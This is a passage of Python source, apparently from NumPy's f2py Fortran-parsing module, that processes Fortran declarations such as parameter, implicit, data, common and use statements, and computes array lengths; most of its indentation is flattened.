if 'externals' not in groupcache[groupcounter]:
groupcache[groupcounter]['externals'] = []
groupcache[groupcounter]['externals'].append(k)
last_name = k
groupcache[groupcounter]['vars'] = edecl
if last_name is not None:
previous_context = ('variable', last_name, groupcounter)
elif case == 'parameter':
edecl = groupcache[groupcounter]['vars']
ll = m.group('after').strip()[1:-1]
last_name = None
for e in markoutercomma(ll).split('@,@'):
try:
k, initexpr = [x.strip() for x in e.split('=')]
            except ValueError:
outmess(
'analyzeline: could not extract name,expr in parameter statement "%s" of "%s"\n' % (e, ll))
continue
params = get_parameters(edecl)
k = rmbadname1(k)
if k not in edecl:
edecl[k] = {}
if '=' in edecl[k] and (not edecl[k]['='] == initexpr):
outmess('analyzeline: Overwriting the value of parameter "%s" ("%s") with "%s".\n' % (
k, edecl[k]['='], initexpr))
t = determineexprtype(initexpr, params)
if t:
if t.get('typespec') == 'real':
tt = list(initexpr)
for m in real16pattern.finditer(initexpr):
tt[m.start():m.end()] = list(
initexpr[m.start():m.end()].lower().replace('d', 'e'))
initexpr = ''.join(tt)
elif t.get('typespec') == 'complex':
initexpr = initexpr[1:].lower().replace('d', 'e').\
replace(',', '+1j*(')
try:
v = eval(initexpr, {}, params)
except (SyntaxError, NameError, TypeError) as msg:
errmess('analyzeline: Failed to evaluate %r. Ignoring: %s\n'
% (initexpr, msg))
continue
edecl[k]['='] = repr(v)
if 'attrspec' in edecl[k]:
edecl[k]['attrspec'].append('parameter')
else:
edecl[k]['attrspec'] = ['parameter']
last_name = k
groupcache[groupcounter]['vars'] = edecl
if last_name is not None:
previous_context = ('variable', last_name, groupcounter)
elif case == 'implicit':
if m.group('after').strip().lower() == 'none':
groupcache[groupcounter]['implicit'] = None
elif m.group('after'):
if 'implicit' in groupcache[groupcounter]:
impl = groupcache[groupcounter]['implicit']
else:
impl = {}
if impl is None:
outmess(
'analyzeline: Overwriting earlier "implicit none" statement.\n')
impl = {}
for e in markoutercomma(m.group('after')).split('@,@'):
decl = {}
m1 = re.match(
r'\s*(?P<this>.*?)\s*(\(\s*(?P<after>[a-z-, ]+)\s*\)\s*|)\Z', e, re.I)
if not m1:
outmess(
'analyzeline: could not extract info of implicit statement part "%s"\n' % (e))
continue
m2 = typespattern4implicit.match(m1.group('this'))
if not m2:
outmess(
'analyzeline: could not extract types pattern of implicit statement part "%s"\n' % (e))
continue
typespec, selector, attr, edecl = cracktypespec0(
m2.group('this'), m2.group('after'))
kindselect, charselect, typename = cracktypespec(
typespec, selector)
decl['typespec'] = typespec
decl['kindselector'] = kindselect
decl['charselector'] = charselect
decl['typename'] = typename
for k in list(decl.keys()):
if not decl[k]:
del decl[k]
for r in markoutercomma(m1.group('after')).split('@,@'):
if '-' in r:
try:
begc, endc = [x.strip() for x in r.split('-')]
                    except ValueError:
outmess(
'analyzeline: expected "<char>-<char>" instead of "%s" in range list of implicit statement\n' % r)
continue
else:
begc = endc = r.strip()
if not len(begc) == len(endc) == 1:
outmess(
'analyzeline: expected "<char>-<char>" instead of "%s" in range list of implicit statement (2)\n' % r)
continue
for o in range(ord(begc), ord(endc) + 1):
impl[chr(o)] = decl
groupcache[groupcounter]['implicit'] = impl
elif case == 'data':
ll = []
dl = ''
il = ''
f = 0
fc = 1
inp = 0
for c in m.group('after'):
if not inp:
if c == "'":
fc = not fc
if c == '/' and fc:
f = f + 1
continue
if c == '(':
inp = inp + 1
elif c == ')':
inp = inp - 1
if f == 0:
dl = dl + c
elif f == 1:
il = il + c
elif f == 2:
dl = dl.strip()
if dl.startswith(','):
dl = dl[1:].strip()
ll.append([dl, il])
dl = c
il = ''
f = 0
if f == 2:
dl = dl.strip()
if dl.startswith(','):
dl = dl[1:].strip()
ll.append([dl, il])
vars = {}
if 'vars' in groupcache[groupcounter]:
vars = groupcache[groupcounter]['vars']
last_name = None
for l in ll:
l = [x.strip() for x in l]
if l[0][0] == ',':
l[0] = l[0][1:]
if l[0][0] == '(':
outmess(
'analyzeline: implied-DO list "%s" is not supported. Skipping.\n' % l[0])
continue
i = 0
j = 0
llen = len(l[1])
for v in rmbadname([x.strip() for x in markoutercomma(l[0]).split('@,@')]):
if v[0] == '(':
outmess(
'analyzeline: implied-DO list "%s" is not supported. Skipping.\n' % v)
# XXX: subsequent init expressions may get wrong values.
# Ignoring since data statements are irrelevant for
# wrapping.
continue
fc = 0
while (i < llen) and (fc or not l[1][i] == ','):
if l[1][i] == "'":
fc = not fc
i = i + 1
i = i + 1
if v not in vars:
vars[v] = {}
if '=' in vars[v] and not vars[v]['='] == l[1][j:i - 1]:
outmess('analyzeline: changing init expression of "%s" ("%s") to "%s"\n' % (
v, vars[v]['='], l[1][j:i - 1]))
vars[v]['='] = l[1][j:i - 1]
j = i
last_name = v
groupcache[groupcounter]['vars'] = vars
if last_name is not None:
previous_context = ('variable', last_name, groupcounter)
elif case == 'common':
line = m.group('after').strip()
if not line[0] == '/':
line = '//' + line
cl = []
f = 0
bn = ''
ol = ''
for c in line:
if c == '/':
f = f + 1
continue
if f >= 3:
bn = bn.strip()
if not bn:
bn = '_BLNK_'
cl.append([bn, ol])
f = f - 2
bn = ''
ol = ''
if f % 2:
bn = bn + c
else:
ol = ol + c
bn = bn.strip()
if not bn:
bn = '_BLNK_'
cl.append([bn, ol])
commonkey = {}
if 'common' in groupcache[groupcounter]:
commonkey = groupcache[groupcounter]['common']
for c in cl:
if c[0] not in commonkey:
commonkey[c[0]] = []
for i in [x.strip() for x in markoutercomma(c[1]).split('@,@')]:
if i:
commonkey[c[0]].append(i)
groupcache[groupcounter]['common'] = commonkey
previous_context = ('common', bn, groupcounter)
elif case == 'use':
m1 = re.match(
r'\A\s*(?P<name>\b[\w]+\b)\s*((,(\s*\bonly\b\s*:|(?P<notonly>))\s*(?P<list>.*))|)\s*\Z', m.group('after'), re.I)
if m1:
mm = m1.groupdict()
if 'use' not in groupcache[groupcounter]:
groupcache[groupcounter]['use'] = {}
name = m1.group('name')
groupcache[groupcounter]['use'][name] = {}
isonly = 0
if 'list' in mm and mm['list'] is not None:
if 'notonly' in mm and mm['notonly'] is None:
isonly = 1
groupcache[groupcounter]['use'][name]['only'] = isonly
ll = [x.strip() for x in mm['list'].split(',')]
rl = {}
for l in ll:
if '=' in l:
m2 = re.match(
r'\A\s*(?P<local>\b[\w]+\b)\s*=\s*>\s*(?P<use>\b[\w]+\b)\s*\Z', l, re.I)
if m2:
rl[m2.group('local').strip()] = m2.group(
'use').strip()
else:
outmess(
                                'analyzeline: no local=>use pattern found in %s\n' % repr(l))
else:
rl[l] = l
groupcache[groupcounter]['use'][name]['map'] = rl
else:
print(m.groupdict())
outmess('analyzeline: Could not crack the use statement.\n')
elif case in ['f2pyenhancements']:
if 'f2pyenhancements' not in groupcache[groupcounter]:
groupcache[groupcounter]['f2pyenhancements'] = {}
d = groupcache[groupcounter]['f2pyenhancements']
if m.group('this') == 'usercode' and 'usercode' in d:
if isinstance(d['usercode'], str):
d['usercode'] = [d['usercode']]
d['usercode'].append(m.group('after'))
else:
d[m.group('this')] = m.group('after')
elif case == 'multiline':
if previous_context is None:
if verbose:
outmess('analyzeline: No context for multiline block.\n')
return
gc = groupcounter
appendmultiline(groupcache[gc],
previous_context[:2],
m.group('this'))
else:
if verbose > 1:
print(m.groupdict())
outmess('analyzeline: No code implemented for line.\n')
def appendmultiline(group, context_name, ml):
if 'f2pymultilines' not in group:
group['f2pymultilines'] = {}
d = group['f2pymultilines']
if context_name not in d:
d[context_name] = []
d[context_name].append(ml)
return
def cracktypespec0(typespec, ll):
selector = None
attr = None
if re.match(r'double\s*complex', typespec, re.I):
typespec = 'double complex'
elif re.match(r'double\s*precision', typespec, re.I):
typespec = 'double precision'
else:
typespec = typespec.strip().lower()
m1 = selectpattern.match(markouterparen(ll))
if not m1:
outmess(
'cracktypespec0: no kind/char_selector pattern found for line.\n')
return
d = m1.groupdict()
for k in list(d.keys()):
d[k] = unmarkouterparen(d[k])
if typespec in ['complex', 'integer', 'logical', 'real', 'character', 'type']:
selector = d['this']
ll = d['after']
i = ll.find('::')
if i >= 0:
attr = ll[:i].strip()
ll = ll[i + 2:]
return typespec, selector, attr, ll
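# Illustrative example: a declaration is split into (typespec, selector,
# attribute string, entity declarations):
#   cracktypespec0('integer', '(kind=8) :: n = 2')
#   ->  ('integer', '(kind=8)', '', ' n = 2')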
#####
namepattern = re.compile(r'\s*(?P<name>\b[\w]+\b)\s*(?P<after>.*)\s*\Z', re.I)
kindselector = re.compile(
r'\s*(\(\s*(kind\s*=)?\s*(?P<kind>.*)\s*\)|[*]\s*(?P<kind2>.*?))\s*\Z', re.I)
charselector = re.compile(
r'\s*(\((?P<lenkind>.*)\)|[*]\s*(?P<charlen>.*))\s*\Z', re.I)
lenkindpattern = re.compile(
r'\s*(kind\s*=\s*(?P<kind>.*?)\s*(@,@\s*len\s*=\s*(?P<len>.*)|)|(len\s*=\s*|)(?P<len2>.*?)\s*(@,@\s*(kind\s*=\s*|)(?P<kind2>.*)|))\s*\Z', re.I)
lenarraypattern = re.compile(
r'\s*(@\(@\s*(?!/)\s*(?P<array>.*?)\s*@\)@\s*[*]\s*(?P<len>.*?)|([*]\s*(?P<len2>.*?)|)\s*(@\(@\s*(?!/)\s*(?P<array2>.*?)\s*@\)@|))\s*(=\s*(?P<init>.*?)|(@\(@|)/\s*(?P<init2>.*?)\s*/(@\)@|)|)\s*\Z', re.I)
def removespaces(expr):
expr = expr.strip()
if len(expr) <= 1:
return expr
expr2 = expr[0]
for i in range(1, len(expr) - 1):
if (expr[i] == ' ' and
((expr[i + 1] in "()[]{}=+-/* ") or
(expr[i - 1] in "()[]{}=+-/* "))):
continue
expr2 = expr2 + expr[i]
expr2 = expr2 + expr[-1]
return expr2
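# Illustrative example: spaces next to operators and parentheses are dropped,
# word-separating spaces are kept:
#   removespaces('1 + 2*len( a )')  ->  '1+2*len(a)'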
def markinnerspaces(line):
l = ''
f = 0
cc = '\''
cb = ''
for c in line:
if cb == '\\' and c in ['\\', '\'', '"']:
l = l + c
cb = c
continue
if f == 0 and c in ['\'', '"']:
cc = c
        if c == cc:
            f = 1 - f  # toggle: entering or leaving a quoted string
elif c == ' ' and f == 1:
l = l + '@_@'
continue
l = l + c
cb = c
return l
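# Illustrative example: only spaces inside a quoted string are marked:
#   markinnerspaces("a 'b c' d")  ->  "a 'b@_@c' d"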
def updatevars(typespec, selector, attrspec, entitydecl):
global groupcache, groupcounter
last_name = None
kindselect, charselect, typename = cracktypespec(typespec, selector)
if attrspec:
attrspec = [x.strip() for x in markoutercomma(attrspec).split('@,@')]
l = []
c = re.compile(r'(?P<start>[a-zA-Z]+)')
for a in attrspec:
if not a:
continue
m = c.match(a)
if m:
s = m.group('start').lower()
a = s + a[len(s):]
l.append(a)
attrspec = l
el = [x.strip() for x in markoutercomma(entitydecl).split('@,@')]
el1 = []
for e in el:
for e1 in [x.strip() for x in markoutercomma(removespaces(markinnerspaces(e)), comma=' ').split('@ @')]:
if e1:
el1.append(e1.replace('@_@', ' '))
for e in el1:
m = namepattern.match(e)
if not m:
outmess(
'updatevars: no name pattern found for entity=%s. Skipping.\n' % (repr(e)))
continue
ename = rmbadname1(m.group('name'))
edecl = {}
if ename in groupcache[groupcounter]['vars']:
edecl = groupcache[groupcounter]['vars'][ename].copy()
not_has_typespec = 'typespec' not in edecl
if not_has_typespec:
edecl['typespec'] = typespec
elif typespec and (not typespec == edecl['typespec']):
outmess('updatevars: attempt to change the type of "%s" ("%s") to "%s". Ignoring.\n' % (
ename, edecl['typespec'], typespec))
if 'kindselector' not in edecl:
edecl['kindselector'] = copy.copy(kindselect)
elif kindselect:
for k in list(kindselect.keys()):
if k in edecl['kindselector'] and (not kindselect[k] == edecl['kindselector'][k]):
outmess('updatevars: attempt to change the kindselector "%s" of "%s" ("%s") to "%s". Ignoring.\n' % (
k, ename, edecl['kindselector'][k], kindselect[k]))
else:
edecl['kindselector'][k] = copy.copy(kindselect[k])
if 'charselector' not in edecl and charselect:
if not_has_typespec:
edecl['charselector'] = charselect
else:
errmess('updatevars:%s: attempt to change empty charselector to %r. Ignoring.\n'
% (ename, charselect))
elif charselect:
for k in list(charselect.keys()):
if k in edecl['charselector'] and (not charselect[k] == edecl['charselector'][k]):
outmess('updatevars: attempt to change the charselector "%s" of "%s" ("%s") to "%s". Ignoring.\n' % (
k, ename, edecl['charselector'][k], charselect[k]))
else:
edecl['charselector'][k] = copy.copy(charselect[k])
if 'typename' not in edecl:
edecl['typename'] = typename
elif typename and (not edecl['typename'] == typename):
outmess('updatevars: attempt to change the typename of "%s" ("%s") to "%s". Ignoring.\n' % (
ename, edecl['typename'], typename))
if 'attrspec' not in edecl:
edecl['attrspec'] = copy.copy(attrspec)
elif attrspec:
for a in attrspec:
if a not in edecl['attrspec']:
edecl['attrspec'].append(a)
else:
edecl['typespec'] = copy.copy(typespec)
edecl['kindselector'] = copy.copy(kindselect)
edecl['charselector'] = copy.copy(charselect)
edecl['typename'] = typename
edecl['attrspec'] = copy.copy(attrspec)
if m.group('after'):
m1 = lenarraypattern.match(markouterparen(m.group('after')))
if m1:
d1 = m1.groupdict()
for lk in ['len', 'array', 'init']:
if d1[lk + '2'] is not None:
d1[lk] = d1[lk + '2']
del d1[lk + '2']
for k in list(d1.keys()):
if d1[k] is not None:
d1[k] = unmarkouterparen(d1[k])
else:
del d1[k]
if 'len' in d1 and 'array' in d1:
if d1['len'] == '':
d1['len'] = d1['array']
del d1['array']
else:
d1['array'] = d1['array'] + ',' + d1['len']
del d1['len']
errmess('updatevars: "%s %s" is mapped to "%s %s(%s)"\n' % (
typespec, e, typespec, ename, d1['array']))
if 'array' in d1:
dm = 'dimension(%s)' % d1['array']
if 'attrspec' not in edecl or (not edecl['attrspec']):
edecl['attrspec'] = [dm]
else:
edecl['attrspec'].append(dm)
for dm1 in edecl['attrspec']:
if dm1[:9] == 'dimension' and dm1 != dm:
del edecl['attrspec'][-1]
errmess('updatevars:%s: attempt to change %r to %r. Ignoring.\n'
% (ename, dm1, dm))
break
if 'len' in d1:
if typespec in ['complex', 'integer', 'logical', 'real']:
if ('kindselector' not in edecl) or (not edecl['kindselector']):
edecl['kindselector'] = {}
edecl['kindselector']['*'] = d1['len']
elif typespec == 'character':
if ('charselector' not in edecl) or (not edecl['charselector']):
edecl['charselector'] = {}
if 'len' in edecl['charselector']:
del edecl['charselector']['len']
edecl['charselector']['*'] = d1['len']
if 'init' in d1:
if '=' in edecl and (not edecl['='] == d1['init']):
outmess('updatevars: attempt to change the init expression of "%s" ("%s") to "%s". Ignoring.\n' % (
ename, edecl['='], d1['init']))
else:
edecl['='] = d1['init']
else:
outmess('updatevars: could not crack entity declaration "%s". Ignoring.\n' % (
ename + m.group('after')))
for k in list(edecl.keys()):
if not edecl[k]:
del edecl[k]
groupcache[groupcounter]['vars'][ename] = edecl
if 'varnames' in groupcache[groupcounter]:
groupcache[groupcounter]['varnames'].append(ename)
last_name = ename
return last_name
def cracktypespec(typespec, selector):
kindselect = None
charselect = None
typename = None
if selector:
if typespec in ['complex', 'integer', 'logical', 'real']:
kindselect = kindselector.match(selector)
if not kindselect:
outmess(
'cracktypespec: no kindselector pattern found for %s\n' % (repr(selector)))
return
kindselect = kindselect.groupdict()
kindselect['*'] = kindselect['kind2']
del kindselect['kind2']
for k in list(kindselect.keys()):
if not kindselect[k]:
del kindselect[k]
for k, i in list(kindselect.items()):
kindselect[k] = rmbadname1(i)
elif typespec == 'character':
charselect = charselector.match(selector)
if not charselect:
outmess(
'cracktypespec: no charselector pattern found for %s\n' % (repr(selector)))
return
charselect = charselect.groupdict()
charselect['*'] = charselect['charlen']
del charselect['charlen']
if charselect['lenkind']:
lenkind = lenkindpattern.match(
markoutercomma(charselect['lenkind']))
lenkind = lenkind.groupdict()
for lk in ['len', 'kind']:
if lenkind[lk + '2']:
lenkind[lk] = lenkind[lk + '2']
charselect[lk] = lenkind[lk]
del lenkind[lk + '2']
del charselect['lenkind']
for k in list(charselect.keys()):
if not charselect[k]:
del charselect[k]
for k, i in list(charselect.items()):
charselect[k] = rmbadname1(i)
elif typespec == 'type':
typename = re.match(r'\s*\(\s*(?P<name>\w+)\s*\)', selector, re.I)
if typename:
typename = typename.group('name')
else:
outmess('cracktypespec: no typename found in %s\n' %
(repr(typespec + selector)))
else:
outmess('cracktypespec: no selector used for %s\n' %
(repr(selector)))
return kindselect, charselect, typename
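# Illustrative examples, with selectors as produced by cracktypespec0:
#   cracktypespec('integer', '(kind=8)')    ->  ({'kind': '8'}, None, None)
#   cracktypespec('character', '(len=10)')  ->  (None, {'len': '10'}, None)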
######
def setattrspec(decl, attr, force=0):
if not decl:
decl = {}
if not attr:
return decl
if 'attrspec' not in decl:
decl['attrspec'] = [attr]
return decl
if force:
decl['attrspec'].append(attr)
if attr in decl['attrspec']:
return decl
if attr == 'static' and 'automatic' not in decl['attrspec']:
decl['attrspec'].append(attr)
elif attr == 'automatic' and 'static' not in decl['attrspec']:
decl['attrspec'].append(attr)
elif attr == 'public' and 'private' not in decl['attrspec']:
decl['attrspec'].append(attr)
elif attr == 'private' and 'public' not in decl['attrspec']:
decl['attrspec'].append(attr)
else:
decl['attrspec'].append(attr)
return decl
def setkindselector(decl, sel, force=0):
if not decl:
decl = {}
if not sel:
return decl
if 'kindselector' not in decl:
decl['kindselector'] = sel
return decl
for k in list(sel.keys()):
if force or k not in decl['kindselector']:
decl['kindselector'][k] = sel[k]
return decl
def setcharselector(decl, sel, force=0):
if not decl:
decl = {}
if not sel:
return decl
if 'charselector' not in decl:
decl['charselector'] = sel
return decl
for k in list(sel.keys()):
if force or k not in decl['charselector']:
decl['charselector'][k] = sel[k]
return decl
def getblockname(block, unknown='unknown'):
if 'name' in block:
return block['name']
return unknown
# post processing
def setmesstext(block):
global filepositiontext
try:
filepositiontext = 'In: %s:%s\n' % (block['from'], block['name'])
    except KeyError:
pass
def get_usedict(block):
usedict = {}
if 'parent_block' in block:
usedict = get_usedict(block['parent_block'])
if 'use' in block:
usedict.update(block['use'])
return usedict
def get_useparameters(block, param_map=None):
global f90modulevars
if param_map is None:
param_map = {}
usedict = get_usedict(block)
if not usedict:
return param_map
for usename, mapping in list(usedict.items()):
usename = usename.lower()
if usename not in f90modulevars:
outmess('get_useparameters: no module %s info used by %s\n' %
(usename, block.get('name')))
continue
mvars = f90modulevars[usename]
params = get_parameters(mvars)
if not params:
continue
# XXX: apply mapping
if mapping:
errmess('get_useparameters: mapping for %s not impl.' % (mapping))
for k, v in list(params.items()):
if k in param_map:
outmess('get_useparameters: overriding parameter %s with'
' value from module %s' % (repr(k), repr(usename)))
param_map[k] = v
return param_map
def postcrack2(block, tab='', param_map=None):
global f90modulevars
if not f90modulevars:
return block
if isinstance(block, list):
ret = []
for g in block:
g = postcrack2(g, tab=tab + '\t', param_map=param_map)
ret.append(g)
return ret
setmesstext(block)
outmess('%sBlock: %s\n' % (tab, block['name']), 0)
if param_map is None:
param_map = get_useparameters(block)
if param_map is not None and 'vars' in block:
vars = block['vars']
for n in list(vars.keys()):
var = vars[n]
if 'kindselector' in var:
kind = var['kindselector']
if 'kind' in kind:
val = kind['kind']
if val in param_map:
kind['kind'] = param_map[val]
new_body = []
for b in block['body']:
b = postcrack2(b, tab=tab + '\t', param_map=param_map)
new_body.append(b)
block['body'] = new_body
return block
def postcrack(block, args=None, tab=''):
"""
TODO:
function return values
determine expression types if in argument list
"""
global usermodules, onlyfunctions
if isinstance(block, list):
gret = []
uret = []
for g in block:
setmesstext(g)
g = postcrack(g, tab=tab + '\t')
# sort user routines to appear first
if 'name' in g and '__user__' in g['name']:
uret.append(g)
else:
gret.append(g)
return uret + gret
setmesstext(block)
    if not isinstance(block, dict) or 'block' not in block:
raise Exception('postcrack: Expected block dictionary instead of ' +
str(block))
if 'name' in block and not block['name'] == 'unknown_interface':
outmess('%sBlock: %s\n' % (tab, block['name']), 0)
block = analyzeargs(block)
block = analyzecommon(block)
block['vars'] = analyzevars(block)
block['sortvars'] = sortvarnames(block['vars'])
if 'args' in block and block['args']:
args = block['args']
block['body'] = analyzebody(block, args, tab=tab)
userisdefined = []
if 'use' in block:
useblock = block['use']
for k in list(useblock.keys()):
if '__user__' in k:
userisdefined.append(k)
else:
useblock = {}
name = ''
if 'name' in block:
name = block['name']
    # Build a __user__ module for the block's external routines
if 'externals' in block and block['externals']:
interfaced = []
if 'interfaced' in block:
interfaced = block['interfaced']
mvars = copy.copy(block['vars'])
if name:
mname = name + '__user__routines'
else:
mname = 'unknown__user__routines'
if mname in userisdefined:
i = 1
while '%s_%i' % (mname, i) in userisdefined:
i = i + 1
mname = '%s_%i' % (mname, i)
interface = {'block': 'interface', 'body': [],
'vars': {}, 'name': name + '_user_interface'}
for e in block['externals']:
if e in interfaced:
edef = []
j = -1
for b in block['body']:
j = j + 1
if b['block'] == 'interface':
i = -1
for bb in b['body']:
i = i + 1
if 'name' in bb and bb['name'] == e:
edef = copy.copy(bb)
del b['body'][i]
break
if edef:
if not b['body']:
del block['body'][j]
del interfaced[interfaced.index(e)]
break
interface['body'].append(edef)
else:
if e in mvars and not isexternal(mvars[e]):
interface['vars'][e] = mvars[e]
if interface['vars'] or interface['body']:
block['interfaced'] = interfaced
mblock = {'block': 'python module', 'body': [
interface], 'vars': {}, 'name': mname, 'interfaced': block['externals']}
useblock[mname] = {}
usermodules.append(mblock)
if useblock:
block['use'] = useblock
return block
def sortvarnames(vars):
indep = []
dep = []
for v in list(vars.keys()):
if 'depend' in vars[v] and vars[v]['depend']:
dep.append(v)
else:
indep.append(v)
n = len(dep)
i = 0
while dep: # XXX: How to catch dependence cycles correctly?
v = dep[0]
fl = 0
for w in dep[1:]:
if w in vars[v]['depend']:
fl = 1
break
if fl:
dep = dep[1:] + [v]
i = i + 1
if i > n:
errmess('sortvarnames: failed to compute dependencies because'
' of cyclic dependencies between '
+ ', '.join(dep) + '\n')
indep = indep + dep
break
else:
indep.append(v)
dep = dep[1:]
n = len(dep)
i = 0
return indep
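# Illustrative example: independent names come first, names with a 'depend'
# entry follow their prerequisites:
#   sortvarnames({'a': {}, 'n': {}, 'x': {'depend': ['n']}})
#   ->  ['a', 'n', 'x']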
def analyzecommon(block):
if not hascommon(block):
return block
commonvars = []
for k in list(block['common'].keys()):
comvars = []
for e in block['common'][k]:
m = re.match(
r'\A\s*\b(?P<name>.*?)\b\s*(\((?P<dims>.*?)\)|)\s*\Z', e, re.I)
if m:
dims = []
if m.group('dims'):
dims = [x.strip()
for x in markoutercomma(m.group('dims')).split('@,@')]
n = m.group('name').strip()
if n in block['vars']:
if 'attrspec' in block['vars'][n]:
block['vars'][n]['attrspec'].append(
'dimension(%s)' % (','.join(dims)))
else:
block['vars'][n]['attrspec'] = [
'dimension(%s)' % (','.join(dims))]
else:
if dims:
block['vars'][n] = {
'attrspec': ['dimension(%s)' % (','.join(dims))]}
else:
block['vars'][n] = {}
if n not in commonvars:
commonvars.append(n)
else:
n = e
errmess(
'analyzecommon: failed to extract "<name>[(<dims>)]" from "%s" in common /%s/.\n' % (e, k))
comvars.append(n)
block['common'][k] = comvars
if 'commonvars' not in block:
block['commonvars'] = commonvars
else:
block['commonvars'] = block['commonvars'] + commonvars
return block
def analyzebody(block, args, tab=''):
global usermodules, skipfuncs, onlyfuncs, f90modulevars
setmesstext(block)
body = []
for b in block['body']:
b['parent_block'] = block
if b['block'] in ['function', 'subroutine']:
if args is not None and b['name'] not in args:
continue
else:
as_ = b['args']
if b['name'] in skipfuncs:
continue
if onlyfuncs and b['name'] not in onlyfuncs:
continue
b['saved_interface'] = crack2fortrangen(
b, '\n' + ' ' * 6, as_interface=True)
else:
as_ = args
b = postcrack(b, as_, tab=tab + '\t')
if b['block'] == 'interface' and not b['body']:
if 'f2pyenhancements' not in b:
continue
if b['block'].replace(' ', '') == 'pythonmodule':
usermodules.append(b)
else:
if b['block'] == 'module':
f90modulevars[b['name']] = b['vars']
body.append(b)
return body
def buildimplicitrules(block):
setmesstext(block)
implicitrules = defaultimplicitrules
attrrules = {}
if 'implicit' in block:
if block['implicit'] is None:
implicitrules = None
if verbose > 1:
outmess(
'buildimplicitrules: no implicit rules for routine %s.\n' % repr(block['name']))
else:
for k in list(block['implicit'].keys()):
if block['implicit'][k].get('typespec') not in ['static', 'automatic']:
implicitrules[k] = block['implicit'][k]
else:
attrrules[k] = block['implicit'][k]['typespec']
return implicitrules, attrrules
def myeval(e, g=None, l=None):
r = eval(e, g, l)
    if type(r) in (int, float):
return r
raise ValueError('r=%r' % (r))
getlincoef_re_1 = re.compile(r'\A\b\w+\b\Z', re.I)
def getlincoef(e, xset): # e = a*x+b ; x in xset
try:
c = int(myeval(e, {}, {}))
return 0, c, None
    except Exception:
pass
if getlincoef_re_1.match(e):
return 1, 0, e
len_e = len(e)
for x in xset:
if len(x) > len_e:
continue
if re.search(r'\w\s*\([^)]*\b' + x + r'\b', e):
            # skip function calls having x as an argument, e.g. max(1, x)
continue
re_1 = re.compile(r'(?P<before>.*?)\b' + x + r'\b(?P<after>.*)', re.I)
m = re_1.match(e)
if m:
try:
m1 = re_1.match(e)
while m1:
ee = '%s(%s)%s' % (
m1.group('before'), 0, m1.group('after'))
m1 = re_1.match(ee)
b = myeval(ee, {}, {})
m1 = re_1.match(e)
while m1:
ee = '%s(%s)%s' % (
m1.group('before'), 1, m1.group('after'))
m1 = re_1.match(ee)
a = myeval(ee, {}, {}) - b
m1 = re_1.match(e)
while m1:
ee = '%s(%s)%s' % (
m1.group('before'), 0.5, m1.group('after'))
m1 = re_1.match(ee)
c = myeval(ee, {}, {})
# computing another point to be sure that expression is linear
m1 = re_1.match(e)
while m1:
ee = '%s(%s)%s' % (
m1.group('before'), 1.5, m1.group('after'))
m1 = re_1.match(ee)
c2 = myeval(ee, {}, {})
if (a * 0.5 + b == c and a * 1.5 + b == c2):
return a, b, x
            except Exception:
pass
break
return None, None, None
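# Illustrative examples: for an expression of the form a*x+b the result is
# (a, b, x), determined by probing the expression numerically:
#   getlincoef('2*x+1', {'x'})  ->  (2, 1, 'x')
#   getlincoef('7', {'x'})      ->  (0, 7, None)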
_varname_match = re.compile(r'\A[a-z]\w*\Z').match
def getarrlen(dl, args, star='*'):
edl = []
try:
edl.append(myeval(dl[0], {}, {}))
    except Exception:
edl.append(dl[0])
try:
edl.append(myeval(dl[1], {}, {}))
    except Exception:
edl.append(dl[1])
if isinstance(edl[0], int):
p1 = 1 - edl[0]
if p1 == 0:
d = str(dl[1])
elif p1 < 0:
d = '%s-%s' % (dl[1], -p1)
else:
d = '%s+%s' % (dl[1], p1)
elif isinstance(edl[1], int):
p1 = 1 + edl[1]
if p1 == 0:
d = '-(%s)' % (dl[0])
else:
d = '%s-(%s)' % (p1, dl[0])
else:
d = '%s-(%s)+1' % (dl[1], dl[0])
try:
return repr(myeval(d, {}, {})), None, None
    except Exception:
pass
d1, d2 = getlincoef(dl[0], args), getlincoef(dl[1], args)
if None not in [d1[0], d2[0]]:
if (d1[0], d2[0]) == (0, 0):
return repr(d2[1] - d1[1] + 1), None, None
b = d2[1] - d1[1] + 1
d1 = (d1[0], 0, d1[2])
d2 = (d2[0], b, d2[2])
if d1[0] == 0 and d2[2] in args:
if b < 0:
return '%s * %s - %s' % (d2[0], d2[2], -b), d2[2], '+%s)/(%s)' % (-b, d2[0])
elif b:
return '%s * %s + %s' % (d2[0], d2[2], b), d2[2], '-%s)/(%s)' % (b, d2[0])
else:
return '%s * %s' % (d2[0], d2[2]), d2[2], ')/(%s)' % (d2[0])
if d2[0] == 0 and d1[2] in args:
if b < 0:
return '%s * %s - %s' % (-d1[0], d1[2], -b), d1[2], '+%s)/(%s)' % (-b, -d1[0])
elif b:
return '%s * %s + %s' % (-d1[0], d1[2], b), d1[2], '-%s)/(%s)' % (b, -d1[0])
else:
return '%s * %s' % (-d1[0], d1[2]), d1[2], ')/(%s)' % (-d1[0])
if d1[2] == d2[2] and d1[2] in args:
a = d2[0] - d1[0]
if not a:
return repr(b), None, None
if b < 0:
return '%s * %s - %s' % (a, d1[2], -b), d2[2], '+%s)/(%s)' % (-b, a)
elif b:
return '%s * %s + %s' % (a, d1[2], b), d2[2], '-%s)/(%s)' % (b, a)
else:
return '%s * %s' % (a, d1[2]), d2[2], ')/(%s)' % (a)
if d1[0] == d2[0] == 1:
c = str(d1[2])
if c not in args:
if _varname_match(c):
                outmess('\tgetarrlen: variable "%s" undefined\n' % (c))
c = '(%s)' % c
if b == 0:
d = '%s-%s' % (d2[2], c)
elif b < 0:
d = '%s-%s-%s' % (d2[2], c, -b)
else:
d = '%s-%s+%s' % (d2[2], c, b)
elif d1[0] == 0:
c2 = str(d2[2])
if c2 not in args:
if _varname_match(c2):
                outmess('\tgetarrlen: variable "%s" undefined\n' % (c2))
c2 = '(%s)' % c2
if d2[0] == 1:
pass
elif d2[0] == -1:
c2 = '-%s' % c2
else:
c2 = '%s*%s' % (d2[0], c2)
if b == 0:
d = c2
elif b < 0:
d = '%s-%s' % (c2, -b)
else:
d = '%s+%s' % (c2, b)
elif d2[0] == 0:
c1 = str(d1[2])
if c1 not in args:
if _varname_match(c1):
                outmess('\tgetarrlen: variable "%s" undefined\n' % (c1))
c1 = '(%s)' % c1
if d1[0] == 1:
c1 = '-%s' % c1
elif d1[0] == -1:
c1 = '+%s' % c1
elif d1[0] < 0:
c1 = '+%s*%s' % (-d1[0], c1)
else:
c1 = '-%s*%s' % (d1[0], c1)
if b == 0:
d = c1
elif b < 0:
d = '%s-%s' % (c1, -b)
else:
d = '%s+%s' % (c1, b)
else:
c1 = str(d1[2])
if c1 not in args:
if _varname_match(c1):
                outmess('\tgetarrlen: variable "%s" undefined\n' % (c1))
c1 = '(%s)' % c1
if d1[0] == 1:
c1 = '-%s' % c1
